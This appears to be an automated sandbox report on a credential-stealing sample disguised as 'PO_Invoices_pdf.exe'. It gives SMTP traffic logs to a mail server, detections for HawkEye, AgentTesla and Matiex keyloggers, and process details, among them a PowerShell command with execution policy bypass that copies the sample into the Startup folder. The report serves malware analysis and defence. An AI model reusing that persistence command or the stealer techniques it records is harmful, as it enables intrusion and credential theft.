                                                                                                  Feb 2, 2021 08:54:52.653999090 CET58749805199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:54:54.997694969 CET58749806199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:54:54.998035908 CET49806587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:54:55.015147924 CET58749807199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:54:55.015799999 CET49807587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:54:55.189517021 CET58749806199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:54:55.190080881 CET49806587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:54:55.206698895 CET58749807199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:54:55.207362890 CET49807587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:54:55.380321980 CET58749806199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:54:55.397460938 CET58749807199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:54:57.700922012 CET58749808199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:54:57.701092958 CET49808587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:54:57.870578051 CET58749809199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:54:57.870820045 CET49809587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:54:57.894201040 CET58749808199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:54:57.894429922 CET49808587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:54:58.062791109 CET58749809199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:54:58.062974930 CET49809587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:54:58.086261034 CET58749808199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:54:58.252882957 CET58749809199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:55:00.334939957 CET58749810199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:55:00.336182117 CET49810587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:55:00.452255964 CET58749811199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:55:00.452501059 CET49811587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:55:00.529437065 CET58749810199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:55:00.529710054 CET49810587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:55:00.642693043 CET58749811199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:55:00.642937899 CET49811587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:55:00.720020056 CET58749810199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:55:00.833960056 CET58749811199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:55:03.041965008 CET58749812199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:55:03.042279005 CET49812587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:55:03.244170904 CET58749812199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:55:03.246289968 CET49812587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:55:03.447788954 CET58749812199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:55:05.709295034 CET58749813199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:55:05.709516048 CET49813587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:55:05.900187016 CET58749813199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:55:05.900346041 CET49813587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:55:06.091825962 CET58749813199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:55:06.739952087 CET58749814199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:55:06.741314888 CET49814587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:55:06.931937933 CET58749814199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:55:06.933430910 CET49814587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:55:07.123622894 CET58749814199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:55:08.336911917 CET58749815199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:55:08.337141037 CET49815587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:55:08.527364016 CET58749815199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:55:08.527591944 CET49815587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:55:08.717672110 CET58749815199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:55:09.286880016 CET58749816199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:55:09.287231922 CET49816587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:55:09.477727890 CET58749816199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:55:09.480767965 CET49816587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:55:09.670908928 CET58749816199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:55:11.825762987 CET58749817199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:55:11.826100111 CET49817587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:55:11.842029095 CET58749818199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:55:11.842259884 CET49818587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:55:12.016412973 CET58749817199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:55:12.016590118 CET49817587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:55:12.033821106 CET58749818199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:55:12.034054995 CET49818587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:55:12.209115982 CET58749817199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:55:12.227118015 CET58749818199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:55:14.469098091 CET58749819199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:55:14.469307899 CET49819587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:55:14.670991898 CET58749819199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:55:14.671222925 CET49819587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:55:14.748943090 CET58749820199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:55:14.749162912 CET49820587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:55:14.872647047 CET58749819199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:55:14.939352989 CET58749820199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:55:14.939585924 CET49820587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:55:15.129380941 CET58749820199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:55:17.125241041 CET58749821199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:55:17.125453949 CET49821587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:55:17.282188892 CET58749822199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:55:17.282394886 CET49822587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:55:17.316113949 CET58749821199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:55:17.316272974 CET49821587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:55:17.472850084 CET58749822199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:55:17.473069906 CET49822587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:55:17.506520987 CET58749821199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:55:17.663238049 CET58749822199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:55:19.663860083 CET58749823199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:55:19.664026976 CET49823587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:55:19.854288101 CET58749823199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:55:19.854476929 CET49823587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:55:19.863238096 CET58749824199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:55:19.863399982 CET49824587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:55:20.047234058 CET58749823199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:55:20.067862034 CET58749824199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:55:20.068080902 CET49824587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:55:20.271485090 CET58749824199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:55:24.527071953 CET58749825199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:55:24.527304888 CET49825587192.168.2.7199.193.7.228EHLO 830021

                                                                                                  Code Manipulations

                                                                                                  Statistics

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  Analysis Process: PO_Invoices_pdf.exe PID: 5372 Parent PID: 5680

                                                                                                  General

                                                                                                  Start time:08:51:34
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Users\user\Desktop\PO_Invoices_pdf.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:'C:\Users\user\Desktop\PO_Invoices_pdf.exe'
                                                                                                  Imagebase:0xaf0000
                                                                                                  File size:1655808 bytes
                                                                                                  MD5 hash:59D7D8D5DD3E0055E7C0DCC75897F569
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                  • Rule: JoeSecurity_Matiex, Description: Yara detected Matiex Keylogger, Source: 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  Reputation:low

                                                                                                  Analysis Process: powershell.exe PID: 5904 Parent PID: 5372

                                                                                                  General

                                                                                                  Start time:08:51:44
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PO_Invoices_pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe'
                                                                                                  Imagebase:0x13c0000
                                                                                                  File size:430592 bytes
                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Reputation:high

                                                                                                  Analysis Process: conhost.exe PID: 8 Parent PID: 5904

                                                                                                  General

                                                                                                  Start time:08:51:44
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff774ee0000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  Analysis Process: RegAsm.exe PID: 4888 Parent PID: 5372

                                                                                                  General

                                                                                                  Start time:08:51:45
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                  Imagebase:0xb60000
                                                                                                  File size:64616 bytes
                                                                                                  MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:Visual Basic
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000003.273863512.0000000003E4D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000003.285132773.0000000003DE1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000003.269169616.00000000010E3000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000003.272090410.0000000003B4B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000003.276618597.0000000003B4B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000003.286093751.00000000010E3000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000003.284634932.0000000003E4D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                  • Rule: JoeSecurity_Matiex, Description: Yara detected Matiex Keylogger, Source: 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000003.271788096.00000000010E3000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000003.283633869.0000000003B4B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  Reputation:moderate

                                                                                                  Analysis Process: hawkgoods.exe PID: 3724 Parent PID: 4888

                                                                                                  General

                                                                                                  Start time:08:51:47
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\hawkgoods.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:'C:\Users\user~1\AppData\Local\Temp\hawkgoods.exe' 0
                                                                                                  Imagebase:0x2f0000
                                                                                                  File size:532992 bytes
                                                                                                  MD5 hash:FFDB58533D5D1362E896E96FB6F02A95
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000006.00000002.390146582.0000000003A21000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000006.00000002.390146582.0000000003A21000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                  • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000006.00000002.398436711.0000000007540000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                  • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000006.00000002.398332656.00000000073F0000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                  • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Arnim Rupp
                                                                                                  • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Joe Security
                                                                                                  • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: JPCERT/CC Incident Response Group
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 96%, ReversingLabs
                                                                                                  Reputation:low

                                                                                                  Analysis Process: origigoods40.exe PID: 6172 Parent PID: 4888

                                                                                                  General

                                                                                                  Start time:08:51:48
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\origigoods40.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:'C:\Users\user~1\AppData\Local\Temp\origigoods40.exe' 0
                                                                                                  Imagebase:0xc30000
                                                                                                  File size:221696 bytes
                                                                                                  MD5 hash:AE36F0D16230B9F41FFECBD3C5B1D660
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.445463818.0000000000C32000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.455680542.0000000002FE1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.455680542.0000000002FE1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000000.273140883.0000000000C32000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 43%, Metadefender, Browse
                                                                                                  • Detection: 82%, ReversingLabs
                                                                                                  Reputation:low

                                                                                                  Analysis Process: Matiexgoods.exe PID: 6264 Parent PID: 4888

                                                                                                  General

                                                                                                  Start time:08:51:51
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\Matiexgoods.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:'C:\Users\user~1\AppData\Local\Temp\Matiexgoods.exe' 0
                                                                                                  Imagebase:0xf70000
                                                                                                  File size:455680 bytes
                                                                                                  MD5 hash:80C61B903400B534858D047DD0919F0E
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_Matiex, Description: Yara detected Matiex Keylogger, Source: 00000008.00000002.681623451.0000000000F72000.00000002.00020000.sdmp, Author: Joe Security
